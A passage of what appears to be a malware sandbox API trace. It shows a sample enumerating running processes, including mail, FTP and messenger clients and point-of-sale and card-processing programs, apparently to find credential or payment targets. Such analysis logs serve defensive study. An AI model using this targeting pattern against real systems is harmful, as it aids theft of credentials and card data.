th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0284.870] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0284.875] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0284.877] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0284.879] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0284.880] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0284.882] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0284.884] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0284.885] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0284.887] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0284.891] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0284.893] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0284.895] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0284.896] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0284.898] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0284.900] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0284.901] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0284.955] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0284.957] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0284.959] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0284.961] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0284.962] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0284.964] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0284.968] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0284.970] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0284.972] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0284.974] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0284.976] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0284.978] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0284.979] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0284.985] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0284.987] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0284.989] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.990] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0284.992] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.993] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0284.995] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0285.031] CloseHandle (hObject=0x2134) returned 1 [0285.031] Sleep (dwMilliseconds=0x64) [0285.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0285.162] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.165] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.167] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.169] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.171] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.173] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.176] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.178] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.180] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.182] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.218] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.220] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.222] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.224] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.226] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.228] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.231] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.233] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.235] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.237] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.239] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0285.241] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0285.243] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.245] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.247] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0285.249] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0285.251] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0285.253] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.255] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.257] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0285.259] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.261] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.312] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0285.314] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0285.316] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0285.318] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0285.320] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0285.322] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0285.349] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0285.351] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0285.353] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0285.355] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0285.358] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0285.360] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0285.362] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0285.364] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0285.366] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, 